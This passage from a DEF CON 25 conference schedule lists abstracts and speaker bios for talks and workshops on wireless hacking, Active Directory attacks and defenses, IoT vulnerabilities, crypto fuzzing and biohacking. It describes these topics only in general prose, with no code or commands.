- Downgrading Modern SSL/TLS Implementations Using Partial HSTS Bypasses
- Firewall and NAC Evasion Using Indirect Wireless Pivots

Each student will receive a course package containing a comprehensive course guide and preconfigured virtual machines. External wireless adapters and other wireless networking hardware will be provided by the instructor, and material learned in the lectures will be practiced within a realistic lab environment. The instructor will make himself available via email for questions and guidance in the weeks leading up to and following the workshop.

Prerequisites: A previous wireless security background is helpful but not required.

Materials: Students will be required to bring their own laptops capable of running virtualization software such as VMWare or VirtualBox. Other than that, I plan on providing the necessary hardware to complete the workshop. Hardware that will be provided to students includes:

- 1 TP-Link WN722N external wireless interface per student
- wireless access points

Max students: 85 | Registration: https://dc25_ryan.eventbrite.com/ (Sold out!)

Gabriel Ryan
Gabriel Ryan is a security consultant and researcher with a passion for wireless and infrastructure testing. He currently works for Gotham Digital Science at their New York office, where he provides full scope red team penetration testing capabilities for a diverse range of clients. He also contributes heavily to his company's research division, GDS labs. Previously, Gabriel has worked as a penetration tester and researcher for the Virginia-based defense contractor OGSystems, and as a systems programmer for Rutgers University. He also is a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 12:00-13:00


Title:
Alice and Bob are Slightly Less Confused

Name:
David Huerta (Freedom of the Press Foundation)

Abstract:
Two years ago at DEF CON I discussed UX issues affecting every kind of encryption tool. Since then, much has improved. Well go over some of the better examples of usable privacy technology and, like last time, go over some new challenges that still need to be addressed to make crypto usable in the real world. This talk is a sequel to this one: https://www.youtube.com/watch?v=pkh7gUm82QY.

Bio:
David Huerta is a Digital Security Fellow at the Freedom of the Press Foundation, where hes working on ways to train journalists to take advantage of privacy-enhancing technology to empower a free press. He's organized dozens of trainings across the US from Brooklyn to Phoenix. Before arriving in New York, he was one of the founding members for HeatSync Labs, an Arizona hackerspace which brings makers, hackers, and the occasional futurist together to build things and teach others how to do the same.
Twitter handle of presenter(s): huertanix

Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 16:00-16:59


Title:
All The Sales President's Men

1600 Friday
Patrick McNeil
@unregistered436
All The Sales President's Men
"Are you someone technical who is starting to evaluate vendors for a new project? Or perhaps you are the person from your team tagged with going to Black Hat, RSA, or other vendor conferences to look at this year's product evaluation candidates?

As technologists and hackers many of us have skills in intelligence gathering, or social engineering, but we might not stop to think about how those same skills are being used against us to influence our purchasing decisions as we evaluate vendors for new projects. Now I know you're thinking, ""I can spot that a mile away"". No free lunch, vendor party, or booth giveaway at big security conference X is going to sway ME, right? Well, I've got a confession to make - it goes way beyond that stuff. As a sales engineer I can be your ally, your advocate, and an asset to your organization. I can also be the secret weapon of the sales team - the guy who speaks both languages - sales and tech. If I dont have good intentions I can convince you to buy something you dont need.

Want to know how? Let me walk you through what happens behind the scenes during the sales cycle at a typical tech company."

Return to Index      -     

 

DEFCON - Track 4 - Saturday - 11:20-12:35


All Your Things Are Belong To Us

Saturday at 11:20 in Track 4

75 minutes | Demo, Exploit

Zenofex Hacker

0x00string Hacker

CJ_000 Hacker

Maximus64 Hacker

Get out your rollerblades, plug in your camo keyboard, and fire up your BLT drive. It's 25 years later and we're still hacking the planet. The Exploitee.rs are back with new 0day, new exploits and more fun. Celebrating a quarter century of DEF CON the best way we know how: hacking everything!

Our presentation will showcase vulnerabilities discovered during our research into thousands of dollars of IoT gear performed exclusively for DEF CON. We will be releasing all the vulnerabilities during the presentation as 0days to give attendees the ability to go home and unlock their hardware prior to patches being released. As always, to give back to the community that has given us so much, we will be handing out free hardware during the presentation so you can hack all the things too!Come party with us while we make "All Your Things Are Belong To Us."

Zenofex
Zenofex (@zenofex) is a researcher with Exploitee.rs. Amir founded "Exploitee.rs" which is a public research group and has released exploits for over 45 devices including the Amazon FireTV, Roku Media Player and the Google Chromecast. Amir is also a member of Austin Hackers and has spoken at a number of security conferences including DEF CON, B-Sides Austin, and InfoSec Southwest.

@exploiteers
@zenofex

0x00string
0x00string (@0x00string) is hacker and security researcher, a recent addition to Exploitee.rs who has presented at BSidesSATX and ISSW. His previous published work includes Reverse Engineering The Kankun Smart Plug, and Hacking The Samsung Allshare Cast Hub. His hobbies include bug collecting and hacking all the things.

@0x00string

CJ_000
Cj_000 (@cj_000) is a researcher in the Cyber and Information Security directorate at *redacted* and also a member of Exploitee.rs. CJ has been involved in the release and responsible disclosure of vulnerabilities in a number of devices including TV's, media players, and refrigerators. CJ has presented at multiple DEF CON's and believes that a simple approach is often the most elegant solution.

@cj_000

Maximus64
Maximus64 (@maximus64_) is an undergraduate student at the University of Central Florida. Khoa enjoys a hardware based approach in researching embedded devices and is a master of the soldering iron. Khoa has disclosed numerous vulnerabilities in various set-top boxes and other "smart" devices to multiple vendors. He is currently listed on various "Security Hall of Fame" pages for successful bug bounty submissions including AT&T, Samsung and Roku.

@maximus64_


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 13:00-13:45


Amateur Digital Archeology

Thursday at 13:00 in 101 Track

45 minutes

Matt 'openfly' Joyce Hacker at NYC Resistor

'Digital Archeology' is actually the name of a Digital Forensics text book. But what if we used forensics techniques targetting cyber crime investigations to help address the void in Archeology that addresses digital media and silicon artifacts. At NYC Resistor in Brooklyn we've gotten into the world of Digital Archeology on several occasions and the projects have been enjoyable and educational.

Now, imagine what could happen if a bunch of hackers are able to get their hands on a laptop pulled off of a space shuttle.

Then come to our talk and find out what ACTUALLY happened. I bought a laptop at auction that claimed to be off a Shuttle Mission. It turns out to have been mostly authentic. This will be a little foray into the history of this device and what I could find out about it, and how I did that.

Spoiler Alert: We found out a lot.

Bonus: I may have found the sister laptop of this laptop (serial numbers match)

Matt 'openfly' Joyce
Matt Joyce hates writing in the third person. He is a hacker at NYC Resistor in Brooklyn. He used to do NASA shit for a project called Nebula. He currently is doing this talk in no way representing current or past employers. Matt's last talk was at the American Homebrewer's Association.


Return to Index      -     

 

DEFCON - Track 3 - Friday - 16:00-16:45


An ACE Up the Sleeve: Designing Active Directory DACL Backdoors

Friday at 16:00 in Track 3

45 minutes | Demo

Andy Robbins Red Team Lead

Will Schroeder Offensive Engineer

Active Directory (AD) object discretionary access control lists (DACLs) are an untapped offensive landscape, often overlooked by attackers and defenders alike. The control relationships between AD objects align perfectly with the "attackers think in graphs" philosophy and expose an entire class of previously unseen control edges, dramatically expanding the number of paths to complete domain compromise.

While DACL misconfigurations can provide numerous paths that facilitate elevation of domain rights, they also present a unique chance to covertly deploy Active Directory persistence. It's often difficult to determine whether a specific AD DACL misconfiguration was set intentionally or implemented by accident. This makes Active Directory DACL backdoors an excellent persistence opportunity: minimal forensic footprint, and maximum plausible deniability.

This talk will cover Active Directory DACLs in depth, our "misconfiguration taxonomy", and enumeration/analysis with BloodHound's newly released feature set. We will cover the abuse of AD DACL misconfigurations for the purpose of domain rights elevation, including common misconfigurations encountered in the wild. We will then cover methods to design AD DACL backdoors, including ways to evade current detections, and will conclude with defensive mitigation/detection techniques for everything described.

Andy Robbins
As a Red Team lead, Andy Robbins has performed penetration tests and red team assessments for a number of Fortune 100 commercial clients, as well as federal and state agencies. Andy presented his research on a critical flaw in the ACH payment processing standard in 2014 at DerbyCon and the ISC2 World Congress, and has spoken at other conferences including DEF CON , BSidesLV, ekoparty, ISSA International, and Paranoia Conf in Oslo. He has a passion for offensive development and red team tradecraft, and helps to develop and teach the "Adaptive Red Team Tactics" course at BlackHat USA.

@_wald0

Will Schroeder
Will Schroeder is a offensive engineer and red teamer. He is a co-founder of Empire/Empyre, BloodHound, and the Veil-Framework, developed PowerView and PowerUp, is an active developer on the PowerSploit project, and is a Microsoft PowerShell MVP. He has presented at a number of conferences, including DEF CON , DerbyCon, Troopers, BlueHat Israel, and various Security BSides.

@harmj0y


Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Friday - 11:00-12:30


An Intro to Hunting with Splunk

Come to Packet Hacking Village and get a hands-on "Hunting with Splunk" training from the experts. You will learn how to deal with end point data, sort through wire data, and maybe even find some advanced threats. Then try your hand at searching for actors in a realistic dataset in Splunk.

Splunk Security Specialists (Twitter: @splunksec) are a group of Security practitioners who play with Splunk and get to help out at things like Wall of Sheep.


Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Sunday - 11:00-12:30


An Intro to Hunting with Splunk

Come to Packet Hacking Village and get a hands-on "Hunting with Splunk" training from the experts. You will learn how to deal with end point data, sort through wire data, and maybe even find some advanced threats. Then try your hand at searching for actors in a realistic dataset in Splunk.

Splunk Security Specialists (Twitter: @splunksec) are a group of Security practitioners who play with Splunk and get to help out at things like Wall of Sheep.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Friday - 14:55-15:40


An Introduction to Graph Theory for OSINT

Abstract

This session aims to gently introduce graph theory and the applied use of graphs for people who, like the speaker, consider themselves lacking the often perceived advanced math, science, and computer programming knowledge needed to harness their power.

The session will include live attendee interaction to help explain the general concepts of graph theory in a safe and inclusive way that should help solidify basic knowledge.

Once everyone understands what a graph can be used for we will discuss its applied use with several use cases including the tracking of security threats, construction of attacker profiles, and even using graphs to better understand organizational risk based the introduction of new tools, processes, or legal requirements.

Attendees may not leave with a Ph.D. but they’ll certainly walk away with a firm understanding of graph theory and how to construct, deploy, and maintain graphs for security and compliance initiatives within their organization.

Speaker Profile


Return to Index      -     

 

Demolabs - Table 3 - Saturday - 10:00-11:50


Android Tamer

Anant Shrivastava

Saturday from 1000-1150 at Table Three

Audience: Mobile (specifically Android)

Android Tamer is a project to provide various resources for Android mobile application and device security reviews. Be it pentesting, malware analysis, reverse engineering or device assessment. We strive to solve some of the major pain points in setting up the testing environments by providing various ways and means to perform the task in most effortless manner.

https://androidtamer.com/

Anant Shrivastava
Anant Shrivastava is an information security professional with nearly 10 years of hacking and teaching experience, with expertise in Mobile, Web Application, Networks and Linux Security. He is Regional Director Asia Pacific for NotSoSecure Global Services and has lead hacking training at some of the worlds top security conferences (BlackHat USA/EU/ASIA, Nullcon, g0s, c0c0n). Anant also leads Open Source project AndroidTamer (www.androidtamer.com) and CodeVigilant (www.codevigilant.com).


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Friday - 10:30-14:30


Applied Physical Attacks on Embedded Systems, Introductory Version

Friday, 10:30 to 14:30 in Octavius 7

Joe FitzPatrick Instructor & Researcher, Securing Hardware

Syler Clayton Security Engineer

Chris Castellano Senior Enterprise Windows Sysadmin

This workshop introduces several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience with UART, SPI, and JTAG interfaces on a MIPS-based wifi development board. After a brief architectural overview of each interface, hands-on labs will guide through the process understanding, observing, interacting with, and exploiting the interface to potentially access a root shell on the target.

Prerequisites: No hardware or electrical background is required. Computer architecture knowledge, Linux internals, command-line familiarity, and low-level programming experience all very helpful but not actually required.

Materials: All equipment, including laptops, will be provided for use in the class. Students will be provided with a lab manual that includes an equipment list of all materials used for the class.

Max students: 60 | Registration: https://dc25_fitzpatrick.eventbrite.com (Sold out!)

Joe FitzPatrick
Joe (@securelyfitz) is an Instructor and Researcher at https://SecuringHardware.com (@securinghw). Joe has spent over a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He has spent the past 5 years developing and leading hardware security related training, instructing hundreds of security researchers, pen testers, hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.

Syler Clayton
Syler Clayton (@SylerClayton) is known in the homebrew scene for his work reverse engineering and developing exploits for the Nintendo 3DS and Wii U. Professionally, he has spent the past 5 years as a Security Engineer doing reverse engineering, exploit development, penetration testing & software development. Since 2015, Syler has led the Red Team for the Collegiate Cyber Defense Competition At-Large regional. In his free time, Syler enjoys hacking on embedded systems in the form of video games, racing drones, virtual reality & electric longboards.

Chris Castellano
Chris Castellano (@StealthyC) is a Senior Enterprise Windows Sysadmin, with a high focus in defensive security. Pew Pew.


Return to Index      -     

 

SEV - Emperors BR II - Saturday - 16:55-17:25



Saturday July 29 4:55PM 30 Mins
To Be Announced Soon:

Michele Fincher: @SultryAsian
Michele Fincher is the Chief Influencing Agent of Social-Engineer, LLC, possessing over 20 years experience as a behavioral scientist, researcher, and information security professional. Her diverse background has helped solidify Social-Engineer, LLC’s place as the premier social engineering consulting firm.
As a US Air Force officer, Michele’s assignments included the USAF Academy, where she was a National Board Certified Counselor, Assistant Professor, and the Executive Officer in the Department of Behavioral Sciences and Leadership. Upon separating from the Air Force, Michele went on to hold positions with a research and software development firm in support of the US Air Force Research Laboratory as well as an information security firm, conducting National Security Agency appraisals and Certification and Accreditation for federal government information systems. She also returned to the USAF Academy, once again in the Department of Behavioral Sciences and Leadership, as a civilian instructor.
At Social-Engineer, LLC, Michele is a senior penetration tester and trainer with professional expertise in all facets of social engineering vectors, assessments, and research. A remarkable writer, she is also the talent behind many of the written products of Social-Engineer, LLC, including numerous reports and assessments, blog posts, and the Social-Engineer Newsletters. Michele is also the co-author of the very popular book, Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails.
Michele is an often-requested trainer and speaker on various technical and behavioral subjects for law enforcement, the intelligence community, and the private sector in venues including the Black Hat Briefings, RSA, Techno Security, SC Congress, and the Advanced Practical Social Engineering training course.
Michele has her Bachelor of Science in Human Factors Engineering from the US Air Force Academy and her Master of Science in Counseling from Auburn University. She is a Certified Information Systems Security Professional (CISSP).


Return to Index      -     

 

DEFCON - Track 1 - Friday - 15:00-15:45


Assembly Language is Too High Level

Friday at 15:00 in 101 Track

45 minutes | Demo, Tool, Exploit

XlogicX Machine Hacker

Do you have a collection of vulnerable programs that you have not yet been able to exploit? There may yet still be hope. This talk will show you how to look deeper (lower level). If you've ever heard experts say how x86 assembly language is just a one-to-one relationship to its machine-code, then we need to have a talk. This is that talk; gruesome detail on how an assembly instruction can have multiple valid representations in machine-code and vice versa. You can also just take my word for it, ignore the details like a bro, and use the tool that will be released for this talk: the Interactive Redundant Assembler (irasm). You can just copy the alternate machine code from the tool and use it in other tools like mona, use it to give yourself more options for self-modifying code, fork Hydan (stego) and give it more variety, or to create peace on earth.

XlogicX
XlogicX hacks at anything low level. He's unmasked sanitized IP addresses in packets (because checksums) and crafts his own pcaps with just xxd. He feeds complete garbage to forensic tools, AV products, decompression software, and intrusion detection systems. He made evil strings more evil (with automation) to exploit high consumption regular expressions. Lately he has been declaring war on assembly language (calling it too high-level) and doing all kinds of ignorant things with machine code. More information can be found on xlogicx.net

@XlogicX


Return to Index      -     

 

RCV - Palermo room, Promenade level - Friday - 17:25-17:59


Attack Surface Discovery with Intrigue

Abstract

What’s more fun than discovering vulnerable and attack-worthy systems on the internet? Come join us for live demos!

Intrigue is a powerful and extensible open source engine for discovering attack surface. It helps security researchers, penetration testers, bug bounty hunters, and defenders to discover assets and their vulnerabilities. During this session, we’ll demo Intrigue and talk through architecture, with focus on recent areas of improvement such as meta-entities and discovery automation strategies.

Speaker Profile

Jonathan Cran (@jcran)


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 4 - Thursday - 10:30-14:30


Attacking Active Directory and Advanced Methods of Defense

Thursday, 10:30 to 14:30 in Octavius 4

Adam Steed Associate Director, Protiviti

Andrew Allen Senior Consultant, Protiviti

This hands on workshop teaches you how to both attack and defend Active Directory. We will start by deploying an Active Directory environment using the typical security settings found in most medium to large organizations. Participants will then learn current common methods and tools used to exploit Active Directory against their test environments. Participants will create a hardened Active Directory environment using advanced methods to secure domain controllers from attack and then try to compromise their hardened environments.

Prerequisites: A basic to intermediate understanding of how Active Directory works including day to day administration of users and implementing group policy.

Materials: All participants will need be bring a laptop to the workshop that can be used to spin up virtual machines or have access to a personal AWS or Azure instance.

Max students: 72 | Registration: https://dc25_steed.eventbrite.com/ (Sold out!)

Adam Steed
Adam Steed prides himself in not just being an Information Security professional, but has been part of the culture that has defined Defcon for the last two decades. He has over 20 years of experience in working for Financial, Websites and Healthcare organizations. Currently Adam an Associate Director at Protiviti as part of the Security and Privacy practice. He has also spoken at Bsides and other events across the United States.

Andrew Allen
Andrew Allen is a senior consultant in the IT Security and Privacy Management Practice at Protiviti. He served as an Information Assurance Security Officer in the United States Army before receiving a B.S. in Information Science and Technology from Temple University. His career has centered on penetration testing and is an offensive PowerShell enthusiast.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 5 - Thursday - 14:30-18:30


Attacking and Defending 802.11ac Networks

Thursday, 14:30 to 18:30 in Octavius 5

Vivek Ramachandran Founder, Pentester Academy

Thomas d'Otreppe Wireless Security Researcher

802.11ac networks pose a significant challenge to existing Wi-Fi hacking tools and techniques. Unlike the previous generation of 802.11 networks, AC brings about significant complexities with features such as multi-user MIMO, advanced beamforming, up to 8 spatial streams, extremely high speeds (Gbps) and wide channel bandwidths 80-160. This workshop will help you "upgrade" your existing tools and techniques for both attacking and defending these networks. After this workshop, you will be able to create your own 802.11ac monitoring and attack platform.

Prerequisites: Working knowledge of Wi-Fi and Linux

Materials: We will be providing files which can downloaded to follow the class. Wireshark needs to be installed.

Max students: 90 | Registration: https://dc25_ramachandran.eventbrite.com (Sold out!)

Vivek Ramachandran
Vivek Ramachandran is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking, conceptualized enterprise Wi-Fi Backdoors, created Chellam - the world's first Wi-Fi Firewall and Chigula - a Wi-Fi data mining and IDS framework. He is also the author of multiple five star rated books which have together sold over 13,000+ copies worldwide and have been translated to multiple languages. Vivek started"SecurityTube.net"in 2007, a YouTube for security which current aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. Vivek's work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada etc. places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, Defcon, Hacktivity, Brucon and others

Thomas d'Otreppe
Thomas D'Otreppe is a wireless security researcher and author of Aircrack-ng, the most popular and complete suite of tools for WiFi network security assessments. He also created OpenWIPS-ng, an open source Wireless Intrusion Prevention System. Thomas is a contributor to the WiFi stack and toolset in Backtrack Linux, which has now become Kali Linux, the de facto top choice Linux distribution for penetration testing and vulnerability assessment across multiple technology domains. He is also known as an author of a pro-active wireless security course which has been delivered to large numbers of IT Security professionals worldwide. Thomas speaks and teaches in the Americas and Europe and is a well-known speaker at DefCon, BlackHat, DerbyCon, SharkFest, Mundo Hacker Day, BruCON and other venues


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 14:00-14:45


Attacking Autonomic Networks

Saturday at 14:00 in 101 Track

45 minutes | Demo, Exploit

Omar Eissa Security Analyst, ERNW GmbH

Autonomic systems are smart systems which do not need any human management or intervention. Cisco is one of the first companies to deploy the technology in which the routers are just "Plug and Play" with no need for configuration. All that is needed is 5 commands to build fully automated network. It is already supported in pretty much all of the recent software images for enterprise level and carrier grade routers/switches.

This is the bright side of the technology. On the other hand, the configuration is hidden and the interfaces are inaccessible. The protocol is proprietary and there is no mechanism to know what is running within your network.

In this talk, we will have a quick overview on Cisco's Autonomic Network Architecture, then I will reverse-engineer the proprietary protocol through its multiple phases. Finally, multiple vulnerabilities (overall 5) will be presented, one of which allows to crash systems remotely by knowing their IPv6 address.

Omar Eissa
Omar Eissa is a security Analyst working for ERNW. His interests are network security and reverse-engineering. He is a professional Cisco engineer with various years of experience in enterprise and ISPs networks. He has given talks and workshops at various telco events and conferences like Troopers17 and Black Hat USA 2017.


Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Friday - 10:00-10:59


Attacking Wireless Interfaces in Vehicles

No description available


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 17:30-18:00


Title:
Automated Testing using Crypto Differential Fuzzing (DO NOT RECORD)

Author:
Yolan Romailler (Kudelski Security)

Abstract:
I present a new approach to test crypto software we developed together with JP Aumasson: differential fuzzing and our newly released tool, CDF, implementing it along with many edge case tests for common algorithms such as ECDSA, DSA and RSA. CDF also features time leakage detection.

CDF allowed the discovery of issues in high-profile, widely used crypto software components such as Go's crypto package, OpenSSL, and mbedTLS.

It is easy to use CDF to test your own library and everything is performed in a black-box fashion, so you only need to provide CDF with an executable to test it.

Bio:
Yolan Romailler is a Security Researcher at Kudelski Seucrity, where he delves into (and dwells on) cryptography, crypto code, and other fun things. He graduated in mathematics at EPFL and later in information security at HES-SO, both in Switzerland.
Twitter handle of presenter(s): anomalroil

Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Friday - 11:30-11:55


Eric Escobar (JusticeBeaver)

Bio

Eric Escobar is a Principal Consultant at SecureWorks. His projects generally include a mixture of Raspberry Pis, 3D printing, wireless tech and maybe even a rocket or two. Before he started chasing shells, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR and Ham Radio. His team consecutively won first place at DEF CON 23 and 24's Wireless CTF, snagging a black badge along the way.

Automating Physical Home Security through Hacking

Abstract

This presentation will dive into hacking wireless security systems present in many residential homes. A number of common wireless sensors are susceptible to a wide range of vulnerabilities including denial of service attacks, replay attacks and information disclosures. Sensors that detect motion, smoke, water leaks, gas leaks and open doors use similar weak communication protocols. Weaknesses in these sensors can present a juicy target to a tech savvy thief. With a Raspberry Pi and an Arduino, it's possible to exploit these weaknesses as well as create your own robust alarm system. With this system, you can customize text message alerts and detect a denial of service attack. This presentation will discuss how to exploit these vulnerabilities and how to use the same exploits to defend against the dark arts.


Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Friday - 12:00-12:59


Autosar SecOC – Secure On-Board Comms

No description available


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Friday - 17:10-17:30


AWS Persistence and Lateral Movement Techniques

Peter Ewane, Security Researcher at AlienVault

The use of Amazon Cloud as a base of operations for businesses is increasing at a rapid rate. Everyone from 2 person start-ups to major companies have been migrating to the cloud. Because of this migration, cloud vendors have become the focus of potential exploitation and various role abuse in order to achieve persistence. This presentation will cover several different methods of post-infection and account persistence along with a discussion on best practices that can be used to protect from such techniques.

Peter Ewane (Twitter: @eaterofpumpkin) is a security researcher, sometimes conference speaker and a mostly blue teamer for the Alien Vault Labs Team. When not playing with computers, Peter enjoys trying and making interesting cocktails and collecting whisk(e)y.


Return to Index      -     

 

DEFCON - Track 2 - Sunday - 11:00-11:45


Backdooring the Lottery and Other Security Tales in Gaming over the Past 25 Years

Sunday at 11:00 in Track 2

45 minutes

Gus Fritschie CTO, SeNet International

Evan Teitelman Engineer, SeNet International

In this talk Gus and Evan will discuss the recent Hot Lotto fraud scandal and how one MUSL employee, Eddie Tipton, was able to rig several state lotteries and win $17 million (or perhaps more). Gus' firm is actively supporting the prosecution in this case. Evan was responsible for identifying and analyzing how Eddie was able to rig the RNG.

Details on the rigged RNG and other details from the case will be presented publicly for the first time during this talk.

For historical context other related attacks including the Ron Harris and hacking keno in the 1990's and a recent incident involving a Russian hacking syndicate's exploitation of slot machines will also be discussed.

Gus Fritschie
Gus Fritschie has been involved in information security since 2000. About 5 years ago (after his previous DEF CON presentation on iGaming security) he transitioned a significant portion of his practice into the gaming sector. Since then he has established himself and SeNet as the IT security leader in in gaming. He has supported a number of clients across the gaming spectrum from iGaming operators, land-based casinos, gaming manufacturer, lotteries, tribal gaming, and daily fantasy sports. In his free time he is a recreationally poker player (both online and B&M).

@gfritschie
@senetsecurity

Evan Teitelman
Bio coming soon.


Return to Index      -     

 

SEV - Emperors BR II - Friday - 16:55-17:25


Friday July 28 4:55PM 30 Mins

Beyond Phishing – Building and Sustaining a Corporate SE Program
Just think, 10 years ago, most organizations didn’t have an ethical hacking, red team or even a fully funded Infosec team. Now those teams are the “norm” , but what about a Social Engineering team? Is it possible to build an internal SE team and move past just phishing?  I’ll speak to some of my experiences building and maintaining a SE team and moving past just “phishing”.

Fahey Owen: @fomanchu
Fahey Owens is a information security specialist with 20 + years of IT and 12 years of InfoSec  experience. He spent several years as a system administrator and has held various roles in infosec such as vulnerability management and ethical hacking. He has many industry IT and Infosec certifications and spends his spare time honing his OSINT skills.


Return to Index      -     

 

BHV - Pisa Room - Saturday - 11:00-11:29


Title: Biohackers Die

Speaker: Jeffrey Tibbetts

About Jeffrey:
Jeffrey Tibbetts is a Biohacker, blogger, body mod artist and nurse out of Southern California. He’s been a collaborator on projects ranging from insufflatable peptides that extend REM sleep to non-Newtonian armor implants. He placed 3rd in the Biohack Village Oxytocin Poker Tournament and performed an implant on transhumanist presidential candidate Zoltan Istvan. Jeff hosts the annual event, “Grindfest” in Tehachapi California which New York Times states is for “the real transhumanists.” He shares his lab space with two fantastic cats, Chango and Grumpus, as well as two merely acceptable cats, Binky and Mildew.

Abstract:
Over the past decade, the ways we pursue human improvement have become increasingly invasive. We’ve so far been fortunate, but it’s likely if not inevitable that a death will occur due to biohacking. This presentation discusses the many precautions being taken by biohackers to make our procedures and projects as safe as possible.



Return to Index      -     

 

BHV - Pisa Room - Sunday - 14:00-14:59


Title: Biohacking Street Law

Speaker: Victoria Sutton

About Victoria:
Victoria Sutton, MPA, PhD, JD
Paul Whitfield Horn Professor
Associate Dean for Research and Faculty Development
Director, Center for Biodefense, Law and Public Policy
Director, Science, Engineering and Technology Law Concentration Program
Director, Dual Degree Programs in Science, Engineering and Technology
Founding Editor, Journal for Biosecurity, Biosafety and Biodefense Law


This session will give you some basic tips for avoiding violating the law, and some preventive tips for avoiding potential legal traps if you are a biohacker. Biohacking, in this session, includes body devices, genetic engineering, synthetic biology and laboratory practices. The session will begin with some examples of why you need to know about law for biohackers and discuss legal cases useful for biohackers. The second part of the session will be a workshop-style applying these rules for biohackers.



Return to Index      -     

 

BHV - Pisa Room - Friday - 10:05-10:30


Title: Biohacking: The Moral Imperative to Build a Better You

Speaker: Tim Cannon

About Tim:
Tim Cannon is an American software developer, entrepreneur, and biohacker based in Pittsburgh, Pennsylvania. He is best known as the co-founder and Chief Information Officer of Grindhouse Wetware, a biotechnology startup company that creates technology to augment human capabilities.

Cannon has spoken at conferences around the world on the topics of human enhancement, futurism, and citizen science, including at TEDx Rosslyn, FITUR, the University of Maryland, the World Business Dialogue, the Medical Entrepreneur Startup Hospital, and others. He has been published in Wired and featured in television shows such as National Geographic Channel’s Taboo and "The Big Picture with Kal Penn". Tim has been featured on podcasts including Ryan O'Shea's Future Grind and Roderick Russell's Remarkably Human.

Abstract:
The talk will focus on biohacking as not just an ethically grey zone but instead present the idea that biohacking is not just something we would like to see, but is something we must do if we are ever going to be capable of living up to the morals we espouse.



Return to Index      -     

 

BHV - Pisa Room - Saturday - 15:00-15:29


Title: Biotechnology Needs a Security Patch...Badly

Speaker: Ed You


About Ed:
Covert FBI super squirrel, loves working with legos, haikus, and playing handball with cement spheres. Ask him about his time in Panama-Spanish is his third language fluency, followed by sarcasm.

Abstract:
What talk? Its going to be a theatrical song and interpretive dance related to the 5 w's and how to fix our bio economy. You get it, I know you do.



Return to Index      -     

 

DEFCON - Track 3 - Sunday - 10:20-10:40


BITSInject

Sunday at 10:20 in Track 3

20 minutes | Demo, Tool

Dor Azouri Security researcher, @SafeBreach

Windows' BITS service is a middleman for your download jobs. You start a BITS job, and from that point on, BITS is responsible for the download. But what if we tell you that BITS is a careless middleman? We have uncovered the way BITS maintains its jobs queue using a state file on disk, and found a way for a local administrator to control jobs using special modifications to that file

Comprehending this file's binary structure allowed us to change a job's properties (such as RemoteURL, Destination Path...) in runtime and even inject our own custom job, using none of BITS' public interfaces. This method, combined with the generous notification feature of BITS, allowed us to run a program of our will as the LocalSystem account, within session 0. So if you wish to execute your code as NT AUTHORITY/SYSTEM and the first options that come to mind are psexec/creating a service, we now add a new option: BITSInject.

Here, we will not only introduce the practical method we formed, but also: Reveal the binary structure of the state file for you to play with, and some knowledge we gathered while researching the service flow

We will also provide free giveaways: A one-click python tool that performs the described method; SimpleBITSServer - a pythonic BITS server; A struct definition file, to use for parsing your BITS state file

Dor Azouri
Dor Azouri is a security professional, having 6+ years of unique experience with network security, malware research and infosec data analysis. Currently doing security research @SafeBreach.


Return to Index      -     

 

Night Life - Octavius 3&4 - Saturday - 21:00-26:00


Title:
Blanketfort Con

I'm sorry, did you not read the name of this party? Seriously, why are you even thinking about it? You know you're coming. Bring your blankets and your sense of adventure, it's Blanketfort Con.
Return to Index      -     

 

BHV - Pisa Room - Friday - 16:00-16:29


Title: Blockchain's Role in the Disruption of the Medical Industry

Speakers: John Bass

About John:
John Bass is the Founder and CEO of Hashed Health, a healthcare technology innovation company focused on accelerating the realization of blockchain and distributed ledger technologies. John has over 20 years of experience in healthcare technology with expertise in collaborative platforms, patient engagement, systems integration, supply chain, clinical performance and value-based payments.
Prior to Hashed Health, John was CEO at InVivoLink, a surgical patient registry and care management start-up, acquired by HCA in 2015. John’s experience also includes healthcare B2B startup empactHealth.com which was acquired by Medibuy / Global Healthcare Exchange. John is a native of Nashville and has a Chemistry degree from the University of North Carolina, Chapel Hill.

Abstract:
Over the next ten years, blockchain and distributed ledger technologies will fundamentally change the delivery of care around the globe. The blockchain provides a technical framework where trust is moved from central controlling intermediaries to the open source protocol, freeing data and assets from the control of traditional corporate interests. The great hope is that this evolution will result in the empowerment of consumers, communities, and markets centered on sustainable wellness and environments of health. The coming years represent a unique opportunity to make sure blockchain-based global health initiatives are structured in a way that re-constructs our broken system in a way that improves the lives of individuals and the communities in which they live.



Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 17:00-17:30


Title:
Blue Team TLS Hugs

Author:
Lee Brotherston

Abstract:
TLS, and its older forerunner SSL, are used to maintain the confidentiality and integrity of network communications. This is a double edged sword for Information Security departments as this allows private information to remain private, but can also be used to hide malicious activity.

Current defensive measures for dealing with network traffic encrypted using TLS typically takes one of two forms:

